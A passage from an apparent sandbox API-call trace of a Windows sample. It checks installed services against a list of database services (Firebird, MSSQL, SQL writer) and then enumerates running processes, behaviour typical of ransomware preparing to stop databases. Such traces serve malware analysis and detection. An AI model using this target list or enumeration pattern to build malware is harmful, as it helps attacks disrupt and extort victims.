lpString2="BFE") returned 1 [0042.542] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0042.542] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0042.542] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0042.542] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0042.542] lstrlenW (lpString="BITS") returned 4 [0042.542] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0042.542] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0042.542] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0042.542] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0042.542] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0042.542] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0042.542] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0042.542] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0042.542] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0042.542] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0042.542] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0042.542] lstrlenW (lpString="CDPSvc") returned 6 [0042.542] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0042.542] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0042.542] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0042.543] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0042.543] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0042.543] lstrlenW (lpString="ClickToRunSvc") returned 13 [0042.543] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0042.543] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0042.543] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0042.543] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0042.543] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0042.543] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0042.543] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0042.543] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0042.543] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0042.543] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0042.543] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0042.543] lstrlenW (lpString="CryptSvc") returned 8 [0042.543] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0042.543] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0042.543] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0042.543] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0042.543] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0042.543] lstrlenW (lpString="DcomLaunch") returned 10 [0042.543] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0042.543] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0042.543] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0042.543] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0042.543] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0042.543] lstrlenW (lpString="DeviceAssociationService") returned 24 [0042.543] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0042.543] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0042.543] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0042.544] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0042.544] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0042.544] lstrlenW (lpString="Dhcp") returned 4 [0042.544] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0042.544] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0042.544] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0042.544] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0042.544] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0042.544] lstrlenW (lpString="Dnscache") returned 8 [0042.544] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0042.544] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0042.544] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0042.544] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0042.544] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0042.544] lstrlenW (lpString="DPS") returned 3 [0042.544] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0042.544] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0042.544] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0042.544] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0042.544] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0042.544] lstrlenW (lpString="DusmSvc") returned 7 [0042.544] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0042.544] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0042.544] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0042.544] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0042.544] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0042.544] lstrlenW (lpString="EventLog") returned 8 [0042.544] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0042.544] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0042.544] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0042.545] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0042.545] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0042.545] lstrlenW (lpString="EventSystem") returned 11 [0042.545] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0042.545] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0042.545] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0042.545] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0042.545] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0042.545] lstrlenW (lpString="FontCache") returned 9 [0042.545] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0042.545] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0042.545] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0042.545] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0042.545] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0042.545] lstrlenW (lpString="gpsvc") returned 5 [0042.545] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0042.545] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0042.545] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0042.545] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0042.545] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0042.545] lstrlenW (lpString="iphlpsvc") returned 8 [0042.545] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0042.545] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0042.545] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0042.545] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0042.545] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0042.545] lstrlenW (lpString="KeyIso") returned 6 [0042.545] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0042.545] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0042.545] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0042.545] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0042.546] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0042.546] lstrlenW (lpString="LanmanServer") returned 12 [0042.546] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0042.546] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0042.546] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0042.546] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0042.546] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0042.546] lstrlenW (lpString="LanmanWorkstation") returned 17 [0042.546] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0042.546] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0042.546] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0042.546] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0042.546] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0042.546] lstrlenW (lpString="lfsvc") returned 5 [0042.546] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0042.546] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0042.546] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0042.546] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0042.546] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0042.546] lstrlenW (lpString="lmhosts") returned 7 [0042.547] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0042.547] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0042.547] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0042.547] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0042.547] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0042.547] lstrlenW (lpString="LSM") returned 3 [0042.547] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0042.547] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0042.547] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0042.547] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0042.547] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0042.547] lstrlenW (lpString="MpsSvc") returned 6 [0042.547] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0042.547] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0042.547] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0042.547] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0042.547] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0042.547] lstrlenW (lpString="NcbService") returned 10 [0042.547] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0042.547] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0042.547] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0042.547] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0042.547] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0042.547] lstrlenW (lpString="netprofm") returned 8 [0042.547] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0042.547] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0042.547] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0042.547] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0042.547] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0042.547] lstrlenW (lpString="NgcSvc") returned 6 [0042.547] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0042.547] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0042.548] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0042.548] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0042.548] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0042.548] lstrlenW (lpString="NlaSvc") returned 6 [0042.548] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0042.548] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0042.548] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0042.548] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0042.548] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0042.548] lstrlenW (lpString="nsi") returned 3 [0042.548] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0042.548] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0042.548] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0042.548] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0042.548] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0042.548] lstrlenW (lpString="PcaSvc") returned 6 [0042.548] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0042.548] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0042.548] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0042.548] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0042.548] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0042.548] lstrlenW (lpString="PlugPlay") returned 8 [0042.548] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0042.548] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0042.548] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0042.548] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0042.548] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0042.548] lstrlenW (lpString="Power") returned 5 [0042.548] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0042.548] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0042.548] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0042.549] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0042.549] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0042.549] lstrlenW (lpString="ProfSvc") returned 7 [0042.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0042.549] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0042.549] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0042.549] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0042.549] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0042.549] lstrlenW (lpString="RpcEptMapper") returned 12 [0042.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0042.549] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0042.549] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0042.549] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0042.549] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0042.549] lstrlenW (lpString="RpcSs") returned 5 [0042.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0042.549] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0042.549] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0042.549] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0042.549] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0042.549] lstrlenW (lpString="SamSs") returned 5 [0042.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0042.549] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0042.549] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0042.549] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0042.549] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0042.549] lstrlenW (lpString="Schedule") returned 8 [0042.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0042.549] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0042.549] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0042.549] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0042.549] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0042.550] lstrlenW (lpString="SecurityHealthService") returned 21 [0042.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0042.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0042.550] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0042.550] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0042.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0042.550] lstrlenW (lpString="SENS") returned 4 [0042.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0042.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0042.550] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0042.550] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0042.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0042.550] lstrlenW (lpString="ShellHWDetection") returned 16 [0042.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0042.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0042.550] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0042.550] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0042.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0042.550] lstrlenW (lpString="Spooler") returned 7 [0042.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0042.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0042.550] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0042.550] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0042.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0042.550] lstrlenW (lpString="StateRepository") returned 15 [0042.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0042.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0042.550] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0042.550] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0042.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0042.550] lstrlenW (lpString="SysMain") returned 7 [0042.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0042.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0042.551] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0042.551] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0042.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0042.551] lstrlenW (lpString="SystemEventsBroker") returned 18 [0042.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0042.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0042.551] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0042.551] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0042.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0042.551] lstrlenW (lpString="Themes") returned 6 [0042.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0042.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0042.551] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0042.551] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0042.551] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x617728 | out: hHeap=0x5d0000) returned 1 [0042.551] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x240 [0042.560] Process32FirstW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0042.560] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0042.561] lstrlenW (lpString="System") returned 6 [0042.561] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0042.563] lstrlenW (lpString="smss.exe") returned 8 [0042.563] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0042.564] lstrlenW (lpString="csrss.exe") returned 9 [0042.564] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0042.564] lstrlenW (lpString="wininit.exe") returned 11 [0042.564] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0042.565] lstrlenW (lpString="csrss.exe") returned 9 [0042.565] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0042.566] lstrlenW (lpString="winlogon.exe") returned 12 [0042.566] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0042.566] lstrlenW (lpString="services.exe") returned 12 [0042.566] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0042.567] lstrlenW (lpString="lsass.exe") returned 9 [0042.567] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.568] lstrlenW (lpString="svchost.exe") returned 11 [0042.568] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0042.569] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0042.569] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0042.569] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0042.569] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: lppe=0x19fb74*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.570] lstrlenW (lpString="svchost.exe") returned 11 [0042.570] Process32NextW (in: hSnapshot=0x240, lppe=0x19fb74 | out: 